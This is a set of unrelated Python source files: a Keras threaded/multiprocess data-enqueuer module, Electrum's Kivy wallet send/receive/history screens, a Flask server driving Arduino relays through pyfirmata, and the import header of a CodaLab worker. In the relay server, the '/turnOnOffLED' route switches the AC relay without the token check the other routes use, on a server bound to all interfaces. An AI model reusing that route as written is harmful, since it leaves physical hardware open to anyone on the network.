return multiprocessing.dummy.Pool # ThreadPool
return multiprocessing.Pool
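# Illustrative sketch (not part of the original module): temporarily forcing
# thread pools via the decorator above. `_example_make_pool` is a hypothetical
# helper name used only for this sketch.
@dont_use_multiprocessing_pool
def _example_make_pool(num_workers):
  # Even with use_multiprocessing=True, this resolves to the thread-based
  # multiprocessing.dummy.Pool while the decorator's flag is in effect.
  return get_pool_class(True)(num_workers)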
def get_worker_id_queue():
"""Lazily create the queue to track worker ids."""
global _WORKER_ID_QUEUE
if _WORKER_ID_QUEUE is None:
_WORKER_ID_QUEUE = multiprocessing.Queue()
return _WORKER_ID_QUEUE
def init_pool(seqs):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = seqs
def get_index(uid, i):
"""Get the value from the Sequence `uid` at index `i`.
To allow multiple Sequences to be used at the same time, we use `uid` to
get a specific one. A single Sequence would cause the validation to
overwrite the training Sequence.
Args:
uid: int, Sequence identifier
i: index
Returns:
The value at index `i`.
"""
return _SHARED_SEQUENCES[uid][i]
@keras_export('keras.utils.SequenceEnqueuer')
class SequenceEnqueuer(object):
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
Example:
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.stop()
```
  `enqueuer.get()` should return an infinite stream of data.
"""
def __init__(self, sequence,
use_multiprocessing=False):
self.sequence = sequence
self.use_multiprocessing = use_multiprocessing
global _SEQUENCE_COUNTER
if _SEQUENCE_COUNTER is None:
try:
_SEQUENCE_COUNTER = multiprocessing.Value('i', 0)
except OSError:
# In this case the OS does not allow us to use
# multiprocessing. We resort to an int
# for enqueuer indexing.
_SEQUENCE_COUNTER = 0
if isinstance(_SEQUENCE_COUNTER, int):
self.uid = _SEQUENCE_COUNTER
_SEQUENCE_COUNTER += 1
else:
# Doing Multiprocessing.Value += x is not process-safe.
with _SEQUENCE_COUNTER.get_lock():
self.uid = _SEQUENCE_COUNTER.value
_SEQUENCE_COUNTER.value += 1
self.workers = 0
self.executor_fn = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Starts the handler's workers.
Args:
workers: Number of workers.
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = self._get_executor_init(workers)
else:
# We do not need the init since it's threads.
self.executor_fn = lambda _: get_pool_class(False)(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _send_sequence(self):
"""Sends current Iterable to all workers."""
# For new processes that may spawn
_SHARED_SEQUENCES[self.uid] = self.sequence
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
Args:
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.run_thread.join(timeout)
_SHARED_SEQUENCES[self.uid] = None
def __del__(self):
if self.is_running():
self.stop()
@abstractmethod
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
raise NotImplementedError
@abstractmethod
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of workers.
Returns:
Function, a Function to initialize the pool
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
    Returns:
        Generator yielding tuples `(inputs, targets)`
            or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
@keras_export('keras.utils.OrderedEnqueuer')
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Args:
sequence: A `tf.keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
shuffle: whether to shuffle the data at the beginning of each epoch
"""
def __init__(self, sequence, use_multiprocessing=False, shuffle=False):
super(OrderedEnqueuer, self).__init__(sequence, use_multiprocessing)
self.shuffle = shuffle
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
workers: Number of workers.
Returns:
Function, a Function to initialize the pool
"""
def pool_fn(seqs):
pool = get_pool_class(True)(
workers, initializer=init_pool_generator,
initargs=(seqs, None, get_worker_id_queue()))
_DATA_POOLS.add(pool)
return pool
return pool_fn
def _wait_queue(self):
"""Wait for the queue to be empty."""
while True:
time.sleep(0.1)
if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
return
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
while self.is_running():
try:
inputs = self.queue.get(block=True, timeout=5).get()
if self.is_running():
self.queue.task_done()
if inputs is not None:
yield inputs
except queue.Empty:
pass
except Exception: # pylint: disable=broad-except
self.stop()
six.reraise(*sys.exc_info())
def init_pool_generator(gens, random_seed=None, id_queue=None):
"""Initializer function for pool workers.
Args:
gens: State which should be made available to worker processes.
random_seed: An optional value with which to seed child processes.
id_queue: A multiprocessing Queue of worker ids. This is used to indicate
that a worker process was created by Keras and can be terminated using
the cleanup_all_keras_forkpools utility.
"""
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = gens
worker_proc = multiprocessing.current_process()
# name isn't used for anything, but setting a more descriptive name is helpful
# when diagnosing orphaned processes.
worker_proc.name = 'Keras_worker_{}'.format(worker_proc.name)
if random_seed is not None:
np.random.seed(random_seed + worker_proc.ident)
if id_queue is not None:
# If a worker dies during init, the pool will just create a replacement.
id_queue.put(worker_proc.ident, block=True, timeout=0.1)
def next_sample(uid):
"""Gets the next value from the generator `uid`.
To allow multiple generators to be used at the same time, we use `uid` to
get a specific one. A single generator would cause the validation to
overwrite the training generator.
Args:
uid: int, generator identifier
Returns:
The next value of generator `uid`.
"""
return six.next(_SHARED_SEQUENCES[uid])
@keras_export('keras.utils.GeneratorEnqueuer')
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
The provided generator can be finite in which case the class will throw
a `StopIteration` exception.
Args:
generator: a generator function which yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
random_seed: Initial seed for workers,
will be incremented by one for each worker.
"""
def __init__(self, generator,
use_multiprocessing=False,
random_seed=None):
super(GeneratorEnqueuer, self).__init__(generator, use_multiprocessing)
self.random_seed = random_seed
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Args:
      workers: Number of workers.
Returns:
A Function to initialize the pool
"""
def pool_fn(seqs):
pool = get_pool_class(True)(
workers, initializer=init_pool_generator,
initargs=(seqs, self.random_seed, get_worker_id_queue()))
_DATA_POOLS.add(pool)
return pool
return pool_fn
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
self._send_sequence() # Share the initial generator
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
while True:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(next_sample, (self.uid,)), block=True)
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except StopIteration:
# Special case for finite generators
last_ones = []
while self.queue.qsize() > 0:
last_ones.append(self.queue.get(block=True))
# Wait for them to complete
for f in last_ones:
f.wait()
# Keep the good ones
last_ones = [future.get() for future in last_ones if future.successful()]
for inputs in last_ones:
if inputs is not None:
yield inputs
except Exception as e: # pylint: disable=broad-except
self.stop()
if 'generator already executing' in str(e):
raise RuntimeError(
'Your generator is NOT thread-safe. '
'Keras requires a thread-safe generator when '
'`use_multiprocessing=False, workers > 1`. ')
six.reraise(*sys.exc_info())
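# Illustrative sketch (not part of the original module): pushing a plain
# generator through `GeneratorEnqueuer` with a single thread worker (workers=1
# because the plain generator below is not thread-safe). The batch shapes and
# the helper name are hypothetical.
def _example_generator_enqueuer():
  def batches():
    while True:
      yield np.zeros((4, 8)), np.zeros((4, 1))
  enqueuer = GeneratorEnqueuer(batches(), use_multiprocessing=False)
  enqueuer.start(workers=1, max_queue_size=4)
  stream = enqueuer.get()
  x, y = next(stream)  # one (inputs, targets) tuple pulled off the queue
  enqueuer.stop()
  return x.shape, y.shape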
|
screens.py
|
import asyncio
from decimal import Decimal
import threading
from typing import TYPE_CHECKING, List, Optional, Dict, Any
from kivy.app import App
from kivy.clock import Clock
from kivy.properties import ObjectProperty
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.uix.recycleview import RecycleView
from electrum.invoices import (PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING,
PR_PAID, PR_UNKNOWN, PR_EXPIRED, PR_INFLIGHT,
LNInvoice, pr_expiration_values, Invoice, OnchainInvoice)
from electrum import bitcoin, constants
from electrum.transaction import tx_from_any, PartialTxOutput
from electrum.util import (parse_URI, InvalidBitcoinURI, TxMinedInfo, maybe_extract_bolt11_invoice,
InvoiceError, format_time)
from electrum.lnaddr import lndecode
from electrum.logging import Logger
from .dialogs.confirm_tx_dialog import ConfirmTxDialog
from electrum.gui.kivy import KIVY_GUI_PATH
from electrum.gui.kivy.i18n import _
if TYPE_CHECKING:
from electrum.gui.kivy.main_window import ElectrumWindow
from electrum.paymentrequest import PaymentRequest
class HistoryRecycleView(RecycleView):
pass
class RequestRecycleView(RecycleView):
pass
class PaymentRecycleView(RecycleView):
pass
class CScreen(Factory.Screen):
__events__ = ('on_activate', 'on_deactivate', 'on_enter', 'on_leave')
action_view = ObjectProperty(None)
kvname = None
app = App.get_running_app() # type: ElectrumWindow
def on_enter(self):
# FIXME: use a proper event don't use animation time of screen
Clock.schedule_once(lambda dt: self.dispatch('on_activate'), .25)
pass
def update(self):
pass
def on_activate(self):
setattr(self.app, self.kvname + '_screen', self)
self.update()
def on_leave(self):
self.dispatch('on_deactivate')
def on_deactivate(self):
pass
# note: this list needs to be kept in sync with another in qt
TX_ICONS = [
"unconfirmed",
"close",
"unconfirmed",
"close",
"clock1",
"clock2",
"clock3",
"clock4",
"clock5",
"confirmed",
]
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/history.kv')
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/send.kv')
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/receive.kv')
class HistoryScreen(CScreen):
tab = ObjectProperty(None)
kvname = 'history'
cards = {}
def __init__(self, **kwargs):
self.ra_dialog = None
super(HistoryScreen, self).__init__(**kwargs)
def show_item(self, obj):
key = obj.key
tx_item = self.history.get(key)
if tx_item.get('lightning') and tx_item['type'] == 'payment':
self.app.lightning_tx_dialog(tx_item)
return
if tx_item.get('lightning'):
tx = self.app.wallet.lnworker.lnwatcher.db.get_transaction(key)
else:
tx = self.app.wallet.db.get_transaction(key)
if not tx:
return
self.app.tx_dialog(tx)
def get_card(self, tx_item): #tx_hash, tx_mined_status, value, balance):
is_lightning = tx_item.get('lightning', False)
timestamp = tx_item['timestamp']
key = tx_item.get('txid') or tx_item['payment_hash']
if is_lightning:
status = 0
status_str = 'unconfirmed' if timestamp is None else format_time(int(timestamp))
icon = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/lightning'
message = tx_item['label']
fee_msat = tx_item['fee_msat']
fee = int(fee_msat/1000) if fee_msat else None
fee_text = '' if fee is None else 'fee: %d sat'%fee
else:
tx_hash = tx_item['txid']
conf = tx_item['confirmations']
tx_mined_info = TxMinedInfo(height=tx_item['height'],
conf=tx_item['confirmations'],
timestamp=tx_item['timestamp'])
status, status_str = self.app.wallet.get_tx_status(tx_hash, tx_mined_info)
icon = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/' + TX_ICONS[status]
message = tx_item['label'] or tx_hash
fee = tx_item['fee_sat']
fee_text = '' if fee is None else 'fee: %d sat'%fee
ri = {}
ri['screen'] = self
ri['key'] = key
ri['icon'] = icon
ri['date'] = status_str
ri['message'] = message
ri['fee_text'] = fee_text
value = tx_item['value'].value
if value is not None:
ri['is_mine'] = value <= 0
ri['amount'] = self.app.format_amount(value, is_diff = True)
if 'fiat_value' in tx_item:
ri['quote_text'] = str(tx_item['fiat_value'])
return ri
def update(self, see_all=False):
wallet = self.app.wallet
if wallet is None:
return
self.history = wallet.get_full_history(self.app.fx)
history = reversed(self.history.values())
history_card = self.ids.history_container
history_card.data = [self.get_card(item) for item in history]
class SendScreen(CScreen, Logger):
kvname = 'send'
payment_request = None # type: Optional[PaymentRequest]
parsed_URI = None
def __init__(self, **kwargs):
CScreen.__init__(self, **kwargs)
Logger.__init__(self)
self.is_max = False
def set_URI(self, text: str):
if not self.app.wallet:
return
try:
uri = parse_URI(text, self.app.on_pr, loop=self.app.asyncio_loop)
except InvalidBitcoinURI as e:
self.app.show_info(_("Error parsing URI") + f":\n{e}")
return
self.parsed_URI = uri
amount = uri.get('amount')
self.address = uri.get('address', '')
self.message = uri.get('message', '')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.is_max = False
self.payment_request = None
self.is_lightning = False
def set_ln_invoice(self, invoice: str):
try:
invoice = str(invoice).lower()
lnaddr = lndecode(invoice)
except Exception as e:
self.app.show_info(invoice + _(" is not a valid Lightning invoice: ") + repr(e)) # repr because str(Exception()) == ''
return
self.address = invoice
self.message = dict(lnaddr.tags).get('d', None)
self.amount = self.app.format_amount_and_units(lnaddr.amount * bitcoin.COIN) if lnaddr.amount else ''
self.payment_request = None
self.is_lightning = True
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_unpaid_invoices()
_list.reverse()
payments_container = self.ids.payments_container
payments_container.data = [self.get_card(invoice) for invoice in _list]
def update_item(self, key, invoice):
payments_container = self.ids.payments_container
data = payments_container.data
for item in data:
if item['key'] == key:
item.update(self.get_card(invoice))
payments_container.data = data
payments_container.refresh_from_data()
def show_item(self, obj):
self.app.show_invoice(obj.is_lightning, obj.key)
def get_card(self, item: Invoice) -> Dict[str, Any]:
status = self.app.wallet.get_invoice_status(item)
status_str = item.get_status_str(status)
is_lightning = item.type == PR_TYPE_LN
key = self.app.wallet.get_key_for_outgoing_invoice(item)
if is_lightning:
assert isinstance(item, LNInvoice)
address = item.rhash
if self.app.wallet.lnworker:
log = self.app.wallet.lnworker.logs.get(key)
if status == PR_INFLIGHT and log:
status_str += '... (%d)'%len(log)
is_bip70 = False
else:
assert isinstance(item, OnchainInvoice)
address = item.get_address()
is_bip70 = bool(item.bip70)
return {
'is_lightning': is_lightning,
'is_bip70': is_bip70,
'screen': self,
'status': status,
'status_str': status_str,
'key': key,
'memo': item.message or _('No Description'),
'address': address,
'amount': self.app.format_amount_and_units(item.get_amount_sat() or 0),
}
def do_clear(self):
self.amount = ''
self.message = ''
self.address = ''
self.payment_request = None
self.is_lightning = False
self.is_bip70 = False
self.parsed_URI = None
self.is_max = False
def set_request(self, pr: 'PaymentRequest'):
self.address = pr.get_requestor()
amount = pr.get_amount()
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.message = pr.get_memo()
self.locked = True
self.payment_request = pr
def do_paste(self):
data = self.app._clipboard.paste().strip()
if not data:
self.app.show_info(_("Clipboard is empty"))
return
# try to decode as transaction
try:
tx = tx_from_any(data)
tx.deserialize()
except:
tx = None
if tx:
self.app.tx_dialog(tx)
return
# try to decode as URI/address
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
else:
self.set_URI(data)
def read_invoice(self):
address = str(self.address)
if not address:
self.app.show_error(_('Recipient not specified.') + ' ' + _('Please scan a Navcoin address or a payment request'))
return
if not self.amount:
self.app.show_error(_('Please enter an amount'))
return
if self.is_max:
amount = '!'
else:
try:
amount = self.app.get_amount(self.amount)
except:
self.app.show_error(_('Invalid amount') + ':\n' + self.amount)
return
message = self.message
try:
if self.is_lightning:
return LNInvoice.from_bech32(address)
else: # on-chain
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
if not bitcoin.is_address(address):
self.app.show_error(_('Invalid Bitcoin Address') + ':\n' + address)
return
outputs = [PartialTxOutput.from_address_and_value(address, amount)]
return self.app.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.parsed_URI)
except InvoiceError as e:
self.app.show_error(_('Error creating payment') + ':\n' + str(e))
def do_save(self):
invoice = self.read_invoice()
if not invoice:
return
self.save_invoice(invoice)
def save_invoice(self, invoice):
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.do_pay_invoice(invoice)
def do_pay_invoice(self, invoice):
if invoice.is_lightning():
if self.app.wallet.lnworker:
self.app.protected(_('Pay lightning invoice?'), self._do_pay_lightning, (invoice,))
else:
self.app.show_error(_("Lightning payments are not available for this wallet"))
else:
self._do_pay_onchain(invoice)
def _do_pay_lightning(self, invoice: LNInvoice, pw) -> None:
def pay_thread():
try:
coro = self.app.wallet.lnworker.pay_invoice(invoice.invoice, attempts=10)
fut = asyncio.run_coroutine_threadsafe(coro, self.app.network.asyncio_loop)
fut.result()
except Exception as e:
self.app.show_error(repr(e))
self.save_invoice(invoice)
threading.Thread(target=pay_thread).start()
def _do_pay_onchain(self, invoice: OnchainInvoice) -> None:
outputs = invoice.outputs
amount = sum(map(lambda x: x.value, outputs)) if '!' not in [x.value for x in outputs] else '!'
coins = self.app.wallet.get_spendable_coins(None)
make_tx = lambda rbf: self.app.wallet.make_unsigned_transaction(coins=coins, outputs=outputs, rbf=rbf)
on_pay = lambda tx: self.app.protected(_('Send payment?'), self.send_tx, (tx, invoice))
d = ConfirmTxDialog(self.app, amount=amount, make_tx=make_tx, on_pay=on_pay)
d.open()
def send_tx(self, tx, invoice, password):
if self.app.wallet.has_password() and password is None:
return
self.save_invoice(invoice)
def on_success(tx):
if tx.is_complete():
self.app.broadcast(tx)
else:
self.app.tx_dialog(tx)
def on_failure(error):
self.app.show_error(error)
if self.app.wallet.can_sign(tx):
self.app.show_info("Signing...")
self.app.sign_tx(tx, password, on_success, on_failure)
else:
self.app.tx_dialog(tx)
class ReceiveScreen(CScreen):
kvname = 'receive'
def __init__(self, **kwargs):
super(ReceiveScreen, self).__init__(**kwargs)
Clock.schedule_interval(lambda dt: self.update(), 5)
self.is_max = False # not used for receiving (see app.amount_dialog)
def expiry(self):
return self.app.electrum_config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
def clear(self):
self.address = ''
self.amount = ''
self.message = ''
self.lnaddr = ''
def set_address(self, addr):
self.address = addr
def on_address(self, addr):
req = self.app.wallet.get_request(addr)
self.status = ''
if req:
self.message = req.get('memo', '')
amount = req.get('amount')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
status = req.get('status', PR_UNKNOWN)
self.status = _('Payment received') if status == PR_PAID else ''
def get_URI(self):
from electrum.util import create_bip21_uri
amount = self.amount
if amount:
a, u = self.amount.split()
assert u == self.app.base_unit
amount = Decimal(a) * pow(10, self.app.decimal_point())
return create_bip21_uri(self.address, amount, self.message)
def do_copy(self):
uri = self.get_URI()
self.app._clipboard.copy(uri)
self.app.show_info(_('Request copied to clipboard'))
def new_request(self, lightning):
amount = self.amount
amount = self.app.get_amount(amount) if amount else 0
message = self.message
lnworker = self.app.wallet.lnworker
try:
if lightning:
if lnworker:
key = lnworker.add_request(amount, message, self.expiry())
else:
self.app.show_error(_("Lightning payments are not available for this wallet"))
return
else:
addr = self.address or self.app.wallet.get_unused_address()
if not addr:
if not self.app.wallet.is_deterministic():
addr = self.app.wallet.get_receiving_address()
else:
self.app.show_info(_('No address available. Please remove some of your pending requests.'))
return
self.address = addr
req = self.app.wallet.make_payment_request(addr, amount, message, self.expiry())
self.app.wallet.add_payment_request(req)
key = addr
except InvoiceError as e:
self.app.show_error(_('Error creating payment request') + ':\n' + str(e))
return
self.clear()
self.update()
self.app.show_request(lightning, key)
def get_card(self, req: Invoice) -> Dict[str, Any]:
is_lightning = req.is_lightning()
if not is_lightning:
assert isinstance(req, OnchainInvoice)
address = req.get_address()
else:
assert isinstance(req, LNInvoice)
address = req.invoice
key = self.app.wallet.get_key_for_receive_request(req)
amount = req.get_amount_sat()
description = req.message
status = self.app.wallet.get_request_status(key)
status_str = req.get_status_str(status)
ci = {}
ci['screen'] = self
ci['address'] = address
ci['is_lightning'] = is_lightning
ci['key'] = key
ci['amount'] = self.app.format_amount_and_units(amount) if amount else ''
ci['memo'] = description or _('No Description')
ci['status'] = status
ci['status_str'] = status_str
return ci
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_unpaid_requests()
_list.reverse()
requests_container = self.ids.requests_container
requests_container.data = [self.get_card(item) for item in _list]
def update_item(self, key, request):
payments_container = self.ids.requests_container
data = payments_container.data
for item in data:
if item['key'] == key:
status = self.app.wallet.get_request_status(key)
status_str = request.get_status_str(status)
item['status'] = status
item['status_str'] = status_str
payments_container.data = data # needed?
payments_container.refresh_from_data()
def show_item(self, obj):
self.app.show_request(obj.is_lightning, obj.key)
def expiration_dialog(self, obj):
from .dialogs.choice_dialog import ChoiceDialog
def callback(c):
self.app.electrum_config.set_key('request_expiry', c)
d = ChoiceDialog(_('Expiration date'), pr_expiration_values, self.expiry(), callback)
d.open()
class TabbedCarousel(Factory.TabbedPanel):
'''Custom TabbedPanel using a carousel used in the Main Screen
'''
carousel = ObjectProperty(None)
def animate_tab_to_center(self, value):
scrlv = self._tab_strip.parent
if not scrlv:
return
idx = self.tab_list.index(value)
n = len(self.tab_list)
if idx in [0, 1]:
scroll_x = 1
elif idx in [n-1, n-2]:
scroll_x = 0
else:
scroll_x = 1. * (n - idx - 1) / (n - 1)
mation = Factory.Animation(scroll_x=scroll_x, d=.25)
mation.cancel_all(scrlv)
mation.start(scrlv)
def on_current_tab(self, instance, value):
self.animate_tab_to_center(value)
def on_index(self, instance, value):
current_slide = instance.current_slide
if not hasattr(current_slide, 'tab'):
return
tab = current_slide.tab
ct = self.current_tab
try:
if ct.text != tab.text:
carousel = self.carousel
carousel.slides[ct.slide].dispatch('on_leave')
self.switch_to(tab)
carousel.slides[tab.slide].dispatch('on_enter')
except AttributeError:
current_slide.dispatch('on_enter')
def switch_to(self, header):
# we have to replace the functionality of the original switch_to
if not header:
return
if not hasattr(header, 'slide'):
header.content = self.carousel
super(TabbedCarousel, self).switch_to(header)
try:
tab = self.tab_list[-1]
except IndexError:
return
self._current_tab = tab
tab.state = 'down'
return
carousel = self.carousel
self.current_tab.state = "normal"
header.state = 'down'
self._current_tab = header
# set the carousel to load the appropriate slide
# saved in the screen attribute of the tab head
slide = carousel.slides[header.slide]
if carousel.current_slide != slide:
carousel.current_slide.dispatch('on_leave')
carousel.load_slide(slide)
slide.dispatch('on_enter')
def add_widget(self, widget, index=0):
if isinstance(widget, Factory.CScreen):
self.carousel.add_widget(widget)
return
super(TabbedCarousel, self).add_widget(widget, index=index)
|
irdc_v3.py
|
# import serial
from flask import Flask
from flask import json
from flask import Response
from flask import request
import logging
import os
import threading
import time
import datetime
import signal
from flask_cors import CORS
from pyfirmata import Arduino, util
from time import sleep
up_relay_pin = 2
stop_relay_pin = 3
down_relay_pin = 5
ac_relay_pin = 13
up_led_pin = 10
stop_led_pin = 11
down_led_pin = 12
s = None
app = Flask(__name__)
CORS(app)
magic_sets = []
wifi_sets = [["GGWIFISSID","FF:EE:DD:CC:BB:AA"]]
lastFoundTimeStamp = datetime.datetime.now()
def signal_handler(signal, frame):
global interrupted
interrupted = True
signal.signal(signal.SIGINT, signal_handler)
interrupted = False
def job():
global lastFoundTimeStamp
threadRun = True
while True:
#tmp = os.popen('iwinfo ra0 scan').read()
tmp = os.popen('iwinfo wlan0 scan').read()
#tmp = os.popen('iwlist wlp3s0 scan').readlines()
#print(tmp)
gotSpecificSSID = False
for (ssid,mac) in wifi_sets:
if ssid in tmp and mac in tmp:
gotSpecificSSID = True
break
if gotSpecificSSID:
currentDT = datetime.datetime.now()
#print("FOUND AP at "+ currentDT)
diff = ((currentDT - lastFoundTimeStamp).seconds)
print("diff: "+str(diff))
if diff > 600:
lastFoundTimeStamp = currentDT
# do open
print("FOUND AP at "+ str(currentDT))
relay_action_common(up_relay_pin, up_led_pin)
app.logger.warning("ok, up op by wifi detector")
#time.sleep(8)
nowtime = datetime.datetime.now()
if nowtime.weekday() in range(1,5):
            if nowtime.hour == 2:  # compare ints with ==, not identity
app.logger.warning("wifi scan entering weekday night sleep mode")
time.sleep(6 * 60 * 60)
#if(nowtime.hour is 10):
# app.logger.warning("wifi scan entering weekday morning sleep mode")
# time.sleep(7 * 60 * 60)
# if(nowtime.hour in range(18,20) or nowtime.hour in range(8,10)):
# app.logger.warning("wifi scan entering weekday hi-night mode")
# # 7688 scan interval cant less than 5 seconds
# time.sleep(10)
elif nowtime.weekday() in range(6,7):
            if nowtime.hour == 2:  # compare ints with ==, not identity
app.logger.warning("wifi scan entering weekend night sleep mode")
time.sleep(5 * 60 * 60)
else:
time.sleep(10)
if interrupted:
print("Gotta go")
threadRun = False
break
# ****************************************************
# Connect to the Arduino (ATmega32U4) over /dev/ttyS0, which maps to UART0 (D0/D1).
# The raw-serial path (57600 baud, matching the rate in the Arduino sketch) is kept
# commented out in setup() below; the active code drives the board via pyfirmata.
# ****************************************************
def setup():
# global s
# s = serial.Serial("/dev/ttyS0", 57600)
global board
board = Arduino('/dev/ttyS0')
@app.route("/api/v1.0/turnOnOffLED", methods=['POST'])
def setvideoon():
app.logger.warning("ok,"+ __name__ +" op by "+ request.form['magic'])
value = request.form['value']
app.logger.warning("run setvideoon value:" + value)
if value == 'on':
board.digital[ac_relay_pin].write(1)
else:
board.digital[ac_relay_pin].write(0)
return json.dumps({"status": 200, "comment": "call turnOnOffLED Finish"})
def relay_action_common(relay_pin, led_pin):
board.digital[relay_pin].write(1)
board.digital[led_pin].write(0)
sleep(1)
board.digital[relay_pin].write(0)
board.digital[led_pin].write(1)
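# Illustrative sketch (not part of the original script): how a client could hit
# the /up endpoint exposed below. The host, the port (54321, from app.run at the
# bottom) and the 'magic' token are placeholders; magic_sets is empty by default,
# so a real deployment would populate it first.
def _example_client_up_call(host="127.0.0.1", magic="REPLACE_WITH_MAGIC_TOKEN"):
    import requests  # local import; the rest of this script does not use requests
    resp = requests.post("http://{}:54321/api/v1.0/IRDC/up".format(host),
                         data={"magic": magic})
    return resp.status_code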
@app.route("/api/v1.0/IRDC/up", methods=['POST'])
def up():
app.logger.warning(__name__ +" op ++")
if request.form['magic'] in magic_sets:
app.logger.warning("ok,"+ __name__ +" op by "+ request.form['magic'])
relay_action_common(up_relay_pin, up_led_pin)
# return json.dumps({"status": 200, "comment": "call up Finish"})
else:
app.logger.warning("magic wrong")
return {"status": 200}
@app.route("/api/v1.0/IRDC/stop", methods=['POST'])
def stop():
app.logger.warning(__name__ +" op ++")
if request.form['magic'] in magic_sets:
app.logger.warning("ok,"+ __name__ +" op by "+ request.form['magic'])
relay_action_common(stop_relay_pin, stop_led_pin)
#return json.dumps({"status": 200, "comment": "call stop Finish"})
else:
app.logger.warning("magic wrong")
return {"status": 200}
@app.route("/api/v1.0/IRDC/down", methods=['POST'])
def down():
app.logger.warning(__name__ +" op ++")
if request.form['magic'] in magic_sets:
app.logger.warning("ok,"+ __name__ +" op by "+ request.form['magic'])
relay_action_common(down_relay_pin, down_led_pin)
#return json.dumps({"status": 200, "comment": "call down Finish"})
else:
app.logger.warning("magic wrong")
return {"status": 200}
@app.route("/api/v1.0/IRDC/package_mode", methods=['POST'])
def packageMode():
app.logger.warning(__name__ +" op ++")
if request.form['magic'] in magic_sets:
app.logger.warning("ok,"+ __name__ +" op by "+ request.form['magic'])
relay_action_common(up_relay_pin, up_led_pin)
sleep(2)
relay_action_common(stop_relay_pin, stop_led_pin)
#return json.dumps({"status": 200, "comment": "call down Finish"})
else:
app.logger.warning("magic wrong")
return {"status": 200}
if __name__ == '__main__':
setup()
# t = threading.Thread(target = job)
# t.start()
app.debug = False
handler = logging.FileHandler('flask.log', encoding='UTF-8')
handler.setLevel(logging.DEBUG)
logging_format = logging.Formatter(
'%(asctime)s - %(levelname)s - %(filename)s - %(funcName)s - %(lineno)s - %(message)s')
handler.setFormatter(logging_format)
app.logger.addHandler(handler)
app.run(
host = "0.0.0.0",
port = 54321
)
# t.join()
|
worker.py
|
import logging
import os
import shutil
from subprocess import PIPE, Popen
import threading
import time
import traceback
import socket
import http.client
import sys
from typing import Optional, Set, Dict
import psutil
import docker
from codalab.lib.telemetry_util import capture_exception, using_sentry
import codalab.worker.docker_utils as docker_utils
import requests
from .bundle_service_client import BundleServiceException, BundleServiceClient
from .dependency_manager import DependencyManager
from .docker_utils import DEFAULT_DOCKER_TIMEOUT
from .image_manager import ImageManager
from .download_util import BUNDLE_NO_LONGER_RUNNING_MESSAGE
from .state_committer import JsonStateCommitter
from .bundle_state import BundleInfo, RunResources, BundleCheckinState
